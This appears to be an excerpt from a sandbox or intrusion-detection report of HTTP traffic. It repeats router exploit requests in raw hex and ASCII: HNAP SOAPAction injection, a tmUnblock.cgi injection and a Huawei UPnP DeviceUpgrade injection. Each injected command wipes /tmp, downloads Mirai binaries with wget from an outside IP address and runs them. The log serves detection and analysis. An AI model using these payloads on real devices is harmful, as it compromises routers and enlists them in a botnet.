| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
